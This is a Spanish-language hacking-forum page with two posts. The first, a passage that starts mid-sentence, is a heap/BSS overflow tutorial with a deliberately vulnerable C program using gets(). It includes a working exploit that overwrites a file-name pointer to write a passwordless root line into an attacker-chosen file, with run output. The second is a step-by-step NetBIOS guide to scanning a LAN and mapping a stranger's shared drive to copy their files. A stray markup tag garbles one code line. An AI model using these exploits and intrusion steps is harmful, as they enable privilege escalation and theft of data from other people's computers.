de ejecucion (la otra forma se denomina "en tiempo de compilacion") la memoria
que necesita, entonces el SO busca memoria libre y, si hay disponible, se la
da al programa. Usualmente esto se hace con:

Código: php
char *datos;
datos=(char *) malloc(TAMAÑO_DE_MEMORIA);


y el sistema devolveria en "datos" la zona de memoria asignada o, si no hay
libre, pondria datos a NULL. Aqui vemos que la variable "datos" ha dejado de
ser una variable en el sentido "clasico" de la palabra y pasa a ser un
puntero que, como su propio nombre indica, lo que hace es apuntar a la primera
de una serie de posiciones de memoria.


Alguien se debe estar preguntando ya "si un overflow consiste en
sobreescribir una zona de memoria, como va a ser el SO tan tonto como para
darnos acceso mediante malloc() a una zona de memoria que ya esta siendo
ocupada?". Pues muy sencillo: el SO no es tonto. Bueno, no del todo :). El SO
simplemente hace lo que nosotros le digamos dentro de unos limites, asi que
nunca nos va a dar posiciones que ya estan usadas, pero nada nos impide a
nosotros mismos movernos por esas posiciones. Lo que tenemos que tener en
cuenta es que, como C no hace la comprobacion de que estamos escribiendo en
la posicion de memoria que nos ha asignado el SO (si no comprueba limites en
las variables lo logico es que tampoco compruebe cosas como estas porque los
dos conceptos se basan en lo mismo: escribir en un sitio que no estaba
pensado para ti), siempre vamos a poder escribir en otra que sea
una posicion valida. Es decir, que si tenemos 2 zonas de memoria (no hace
falta que sean consecutivas) asignadas para dos variables, el SO nos va a
permitir escribir en la segunda usando la primera, y viceversa, por la sencilla
razon de que tanto la primera como la segunda apuntan a zonas de memoria que
has sido identificadas como "escribibles" por ese tipo de variables. Vamos a
verlo con un ejemplo que queda muy clarito:

Código: php
<++> heap/ejemplo1.c 92ca44fdc06aa8f1d800ecf7fe6309
/*
* el ejemplo mas simple posible de un overflow en la zona heap
*
* basado directamente en uno de w00w00
*
*/

#include
#include
#include

int main()
{
char *dato1, *dato2; /* nuestras variables */
unsigned long distancia; /* esta es la distancia real en memoria
que van a tener nuestras variables.
si estuvieran las 2 en zonas de memoria
consecutivas, la distancia seria 0 */

/* pedimos la asignacion de memoria. Vamos a pedir 40 bytes */
dato1=(char *) malloc(40);
dato2=(char *) malloc(40);

/* miramos a cuanta distancia estan */
distancia=(unsigned long) dato2 - (unsigned long) dato1;

/* ahora rellenamos dato2 con una cadena normal y corriente. memset()
lo unico q hace es rellenar la posicion de memoria q se le pasa
con un caracter */
memset(dato2,'P',40-1), dato2[40-1]='{jumi [*3] [http://www.govannom.org/seguridad/heap_overf/heap_overf_by_cafo.txt]}';
printf("antes de sobreescribir: %s\n",dato2);

/* sobreescribimos 20 bytes de dato2 usando la variable dato1 y la
distancia que los separa (por si acaso esta no es 0) */

memset(dato1,'*',(unsigned int)(distancia + 20));

/* comprobamos */
printf("despues de sobreescribir: %s\n",dato2);

return 0;
}
<-->


Pues ya lo tenemos, lo ejecutamos y vemos como el puntero dato1 sobreescribe
la zona que tiene asignada dato2; y el SO se lo permite por la sencilla razon
de que ambas zonas (la de dato2 y la que se 'supone' que tiene q usar
dato1) son del mismo tipo y estan inicializadas de la misma forma, y como
C no comprueba las direcciones pues es facil confundirlo para q piense que
dato1 se esta escribiendo en su sitio cuando en realidad estamos en la zona
de dato2.
Código: php

[...]
cafo@thehost:~/nets/heap$ ./ejemplo1
antes de sobreescribir: PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP
despues de sobreescribir: ********************PPPPPPPPPPPPPPPPPPP
[...]


Entonces el concepto ha quedado bastante claro, no? Solamente necesitamos
un puntero que se encuentre en la zona heap que podamos manejar para poder
tener acceso a todos los demas punteros de esa zona.

Bueno, tanto rollo sobre la zona heap y todavia no he explicado lo que es ;)
Pues el Heap es simplemente una zona de memoria dinamica donde almacenar
variables por medio de la llamada a malloc(). Posiblemente los que habeis
leido algun libro sobre arquitectura de SO y demas, os suene la pareja
HEAP/BSS. El BSS (y juro que no he podido encontrar por ningun lado que es lo
que significan esas puñeteras siglas ;) es simplemente la zona de memoria
donde se encuentran las variables globales que no son inicializadas y las
declaradas como 'estaticas'. Por ejemplo, si queremos disponer de memoria sin
tener que inicializarla pero queremos que se comporte como el puntero que
usabamos antes, podemos escribir algo como esto:

static char dato1[40];

y seria el equivalente en la zona BSS a la llamada a malloc() que hicimos en
el programilla anterior.

Bueno, una vez llegados a este punto mas de uno se preguntara "Y esto para
que me sirve a mi?". Pues la verdad es que si te preguntas eso es que todavia
te falta coger bastante practica con eso de los exploits ;). Bueno, en serio.
Simplemente tienes que encontrar un codigo fuente (bastante usual en estos
tiempos de codigo abierto...) que use una de estas variables que he comentado
y que permita al usuario escribirla. La situacion tipica es que el
programador use uno de estos punteros para pedir datos al usuario.

Imaginad que tenemos un programa que lo unico que hace es escribir lo que
nosotros le digamos en un fichero que no podemos elegir. Algo como esto:
Código: php

<++> heap/ejemplo2.c $d102f90f44986e093acb7a01aef6d723
/*
* ejemplo2.c Muestra un programa vulnerable en la zona BSS
*/

#include

int main()
{
FILE *archivo;
static char dato1[16], *tmpfile;

tmpfile="/tmp/mama.txt"; /* ponemos un temporal cualquiera */
printf("antes del exploit: %s\n",tmpfile); /* para asegurarnos... */

printf("Datos a introducir en mama.txt: \n");
gets(dato1);

printf("\ndespues del exploit: %s\n",tmpfile);
archivo=fopen(tmpfile,"w");

fputs(dato1,archivo);
fclose(archivo);
}
<-->


Pues ya tenemos el programa en cuestion. A simple vista no es vulnerable
porque lo unico que se puede modificar "externamente" es lo que se escribe en
el archivo "mama.txt" asi que no tendriamos ningun problema con la seguridad
del sistema, verdad? Ojala fuera asi, porque podemos usar lo que dijimos antes
de sobreescribir punteros para que el programa hiciera ciertas cosas no
deseables, como sobreescribir archivos de sistema o cosas asi, y siempre
podremos encontrar ficheros que al sobreescribir sean utiles, no?

Pues el truco en este caso esta en que la variable donde se guarda el
nombre es un puntero mientras que donde nosotros guardamos los datos que
queremos meter en el archivo esta en la zona BSS, con lo que nos permite
jugar un poco con las direcciones. Lo unico que debemos hacer es empezar a
probar distintos acercamientos a "*tmpfile" desde "datos1" hasta que logremos
sobreescribir por completo la posicion de *tmpfile con la direccion de un
archivo que nos interese escribir. Veamoslo con un ejemplo:

Código: php
<++> heap/exploit2.c $cc2e106df958188984666213aa549c49
/* exploit para el programa ejemplo2.c
* el original sigue estando en w00w00 ;)
*/
#include
#include
#include
#include

#define BUFSIZE 256
#define ERROR -1

#define DIFF 16

#define VULPROG "./ejemplo2"
#define VULFILE "/tmp/mierdapami"

u_long getesp()
{
__asm__("movl %esp,%eax");
}

int main(int argc, char **argv)
{
u_long addr;

register int i;
int mainbufsize;

char *mainbuf, buf[DIFF+6+1] = "+ +\t# ";

memset(buf, 0, sizeof(buf)), strcpy(buf, "root::::/bin/sh\t #");

memset(buf + strlen(buf), 'A', DIFF);
addr = getesp() + atoi(argv[1]);

for (i = 0; i < sizeof(u_long); i++)
buf[DIFF + i] = ((u_long)addr >> (i * 8) & 255);

mainbufsize = strlen(buf) + strlen(VULPROG) +
strlen(VULPROG) + strlen(VULFILE) + 13;

mainbuf = (char *)malloc(mainbufsize);
memset(mainbuf, 0, sizeof(mainbuf));

snprintf(mainbuf, mainbufsize - 1, "echo '%s' | %s %s\n",
buf, VULPROG, VULFILE);


system(mainbuf);
return 0;
}
<-->


Pues nada, aqui tenemos que un programa aparentemente inocente como este,
es capaz de escribir lo que nosotros queramos en cualquier sitio donde
tengamos privilegios de escritura. Solamente tenemos que ir probando
distintos offsets hasta que sobreescribamos la ruta completa:

Código: php
[code][..]
cafo@thehost:~/nets/heap$ ./exploit2 500
antes del exploit: /tmp/mama.txt
Datos a introducir en mama.txt:

despues del exploit: G = spanish
[...]

ups, nos hemos ido a la zona de las variables de entorno (no decia yo que este
tipo de exploit puede ser realmente util? ;). Sigamos probando (esto mas o
menos es el juego del "hundir la flota" pero nosotros tenemos el truco de que
podemos probar millones de valores por minuto, no? :)

[...]
cafo@thehost:~/nets/heap$ ./exploit2 400
antes del exploit: /tmp/mama.txt
Datos a introducir en mama.txt:

despues del exploit: üÿ¿
[...]

Dish, nos hemos ido al codigo ejecutable. Demasiado bajo. Agua ;)

[...]
cafo@thehost:~/nets/heap$ ./exploit2 450
antes del exploit: /tmp/mama.txt
Datos a introducir en mama.txt:

despues del exploit: mplo2
[...]
[/code]

esto ya suena mejor. Es el nombre del programa vulnerable, asi que suponemos
que podemos estar en argv[0], no?. Agua todavia.

[...]
cafo@thehost:~/nets/heap$ ./exploit2 465
antes del exploit: /tmp/mama.txt
Datos a introducir en mama.txt:

despues del exploit: dapami
[...]

bueno bueno bueno, esto ya esta mucho mejor. Acabamos de encontrar nuestra
cadena apuntando al fichero que queremos sobreescribir. TOCADO!. Contando
con los dedos resulta que

[...]
Código: php
cafo@thehost:~/nets/heap$ ./exploit2 456
antes del exploit: /tmp/mama.txt
Datos a introducir en mama.txt:


despues del exploit:
Código: php
/tmp/mierdapami

[...]

HUNDIDO!!! Si todo ha salido bien, tenemos en nuestro directorio tmp ese
archivo con la info q nosotros queriamos que tuviese. Veamoslo:

[...]
Código: php
cafo@thehost:~/nets/heap$ cat /tmp/mierdapami
root::::/bin/sh
cafo@thehost:~/nets/heap

[...]

interesante, verdad? Que pena que esa misma linea no estuviera en otro sitio...
pero nada, como esto no es para que hagais cosas malas, os dejo que
investigues vosotros.

Hasta aqui todo ha salido muy bien. Por supuesto que por ahora solo hemos
estado con programas mios, es decir, que yo sabia al escribirlos que iban
a ser vulnerables. Lo siguiente seria averiguar que tipo de programas
pueden ser vulnerables o que tipo de variables son tipicamentes sobreescritas
por los exploits, pero eso lo dejaremos para la segunda parte del arti ;)

un saludete.

fuente diosdelared
#8
Hacking / Netbios + cain (newbie)
Julio 29, 2010, 09:10:12 PM
NetBIOS Hacking
-Qué es? --
Hacking NetBIOS es el arte de la piratería informática en la computadora de alguien más a través de su ordenador. NetBIOS significa "Red del Sistema Básico de Entrada Salida." Es una forma de que una red LAN o WAN para compartir carpetas, archivos, unidades e impresoras.

-Cómo puede ser esto de utilidad para mí? --
La mayoría de las personas ni siquiera saben, pero cuando están en una LAN o WAN que podría tener la totalidad de su disco duro compartido y ni siquiera saberlo. Así que si podemos encontrar una manera en la red, su equipo está a nuestra disposición.

-¿Qué necesito? --
SO Windows
Caín y Abel (No tienes permitido ver los links. Registrarse o Entrar a mi cuenta)
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++
- [Paso 1, encontrar el objetivo.] --
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++
Así que primero fuera tenemos que encontrar un ordenador o el ordenador para entrar en. Así que si tu conectado a la LAN, o conectado a la WAN, puede empezar. Abrir Caín y Abel. Este programa tiene un sniffer en función. Un sniffer busca todas las direcciones IP en la subred local. Una vez que haya abierto el programa, haga clic en la pestaña sniffer, haga clic en el Start / Stop Sniffer y, a continuación, haga clic en el cruz azul



Otra ventana, asegúrese de que "todos los host en mi subred" está seleccionado y, a continuación, haga clic en Aceptar.



Debería comenzar a escanear.



Luego de la propiedad intelectual, los nombres, direcciones MAC y se mostrarán.
Ahora recuerdo la dirección IP del ordenador que se va a romper en.
Si usted no puede decir si la dirección IP es un ordenador, router, módem, etc, eso es correcto.
Durante el siguiente paso se inicia la prueba y error.



++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++
- [Parte 2, de prueba y error] --
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++

Ahora, no sabemos si tenemos nuestro objetivo designado, o si tenemos un ordenador o impresora, o cualquier otra cosa está en la LAN o WAN.
Si lo hizo llegar el período de investigación de la meta, sin embargo, todavía recomendamos leer a través de esta sección, ya que podría ser útil más adelante.
Haga clic en el menú de inicio y vaya a ejecutar, escriba cmd y haga clic en Aceptar.
Esto debería abrir el símbolo del sistema.
A partir de aquí haremos la mayor parte de la piratería informática.
Ahora me voy a referir a ciertos comandos que se deben introducir en la línea de comandos.
Voy a poner estos comandos en la cita, pero no poner las comillas en el código cuando escriba en el símbolo del sistema.
Sólo estoy haciendo esto para evitar confusiones.
Volvamos a la piratería informática.
Escriba "ping (dirección IP de la meta)." Por ejemplo en este tutorial, "ping 192.168.1.103".
Esto nos permitirá saber si el destino está en línea.
Si funcionó, que se verá algo como esto (la nota, me han privado de información de color):



Si no funciona, lo que significa que la meta no está en línea, que se verá algo como esto:



Si el objetivo no está en línea, ya sea para cambiar un objetivo diferente, o intente otra vez. Si el objetivo está en línea, entonces podemos continuar.

++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++
- [Parte 3, Recolección de la Información.] --
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++

Ahora, la entrada a este comando "nbtstat-a (dirección IP de destino)." Un ejemplo sería "nbtstat-a 192.168.1.103."
Esto nos mostrará si se permitió el uso compartido de archivos, y si hay, que nos dará el: actualmente conectado usuario, grupo de trabajo, y el nombre del equipo.



Bueno, probablemente usted está preguntando, "¿Qué significa todo esto para mí?" Bueno, esto es realmente muy importante, sin que ello, el truco no funcionaría. Así que, permítanme romper hacia abajo desde la parte superior hacia abajo. Me limitaré a dar la primera línea de la información y, a continuación, explicar el párrafo que sigue.

La información debajo de la original de mando dice: "Conexión de área local", esta información nos habla de nuestra conexión a través de la LAN, y en mi caso, no estoy conectado a través de LAN, por lo que el anfitrión no se encuentra, y no hay propiedad intelectual .

La información debajo de la "Conexión de área local", es "Conexión de red inalámbrica 2:" Nos da información sobre la conexión a la meta a través de la WAN. En mi caso estoy conectado a través de la WAN, por lo que fue capaz de encontrar el nodo ipAddress. El Nodo ipAddress es la de área local IP del ordenador que se va a romper en.

La máquina remota de NetBIOS Nombre de la tabla, nos da el grupo de trabajo de nuestro equipo, nos dice si se comparte, y nos da el nombre del equipo. A veces incluso nos da la actualidad, al usuario con sesión iniciada, pero en mi caso, no lo hizo. Batgirl es el nombre del equipo que estoy tratando de conectar. Si observamos a la derecha debería ver un <20>. Esto significa que el uso compartido de archivos está habilitada en Batgirl. Si no hay un <20> a la derecha del nombre, entonces usted ha llegado a un callejón sin salida y necesidad de ir a buscar otro IP, o para dejar de fumar ahora. Batgirl está por debajo de las computadoras para grupos de trabajo, SUPERHEROES. Si usted está confundido acerca de cual es el grupo de trabajo, y la computadora, busque en el tipo de categoría a la derecha de la <> para cada nombre. Si dice ÚNICO, es un sistema, como una impresora o computadora. Si es grupo, entonces es el grupo de trabajo

++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++
- [Paso 4, Rompiendo En] --
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++

Finalmente ha llegado el momento.
Por ahora sabemos: que nuestro objetivo está en línea, nuestro objetivo ha de compartir archivos, y nuestra meta del nombre del equipo.
Así que es hora de romper pulg
Ahora busque el compartidos, carpetas, archivos o impresoras. Escriba "net view \ \ (Dirección IP de destino)"
Un ejemplo de este tutorial sería: "net view \ \ 192.168.1.103"



Hemos encontrado nuestra justa cuota de nuestro nombre. En este caso, bajo el nombre del recurso compartido es "C", lo que significa que la única cosa compartida en el equipo es C. Luego a la derecha, en Tipo, que dice "disco". Esto significa que es el disco de la C ordenador. C El disco puede ser a veces una persona todo el disco duro.

Todos los que se deja de hacer es un "mapa" de la unidad compartida en nuestro ordenador. Esto significa que vamos a hacer una unidad en nuestro ordenador, y todo el contenido de los objetivos de ordenador se puede acceder a través de nuestra unidad de red creada. Escriba "net use K: \ \ (Dirección IP de destino) \ (unidad compartida). Para mi ejemplo, en este tutorial, "net use K: \ \ 192.168.1.103 \ C." Bueno, digamos que usted planea hacer esto de nuevo a otra persona, u hacer ver la "K después de" net use? "Este es la letra de la unidad en la que usted está haciendo en su computadora. Puede ser cualquier carta que desee, siempre que la misma carta, no está en uso por el equipo. Por lo tanto, podría ser "net use G. ..", para un objetivo diferente.



Como puede ver, para mi truco ya he usado "K", por lo que utiliza "G" en su lugar.
Usted también puede hacer lo mismo para múltiples gacetilleros.
Si funcionó, es decir "El comando se ha completado correctamente."
Si no, tendrá que volver a ir pasos.
Ahora la apertura de "Mi PC" en el menú de inicio, y su recién creada unidad de red debe estar allí



Ahora, si se desconecta de la red WAN o LAN, usted no será capaz de acceder a esta unidad, de ahí el nombre de unidad de red.
La unidad no se borrará después de desconectar, aunque, pero no será capaz de acceder a ella hasta que vuelva a la red.
Así que si estás haciendo esto por el contenido de la unidad, recomiendo arrastrar los archivos y carpetas dentro de la unidad en el equipo,
porque nunca se sabe si el objetivo de compartir los cambios de la configuración.
Si usted está haciendo esto para piratear algo, luego explorar y algunos han merecido la diversión!

Felicidades! Ya está!

-Los comandos utilizados en este tutorial:
PING
Nbtstat-a (dirección IP de destino)
NET VIEW \ \ (Dirección IP de destino)
NET USE K: \ \ (Dirección IP de destino) \ (sharename)

Salu2

diosdelared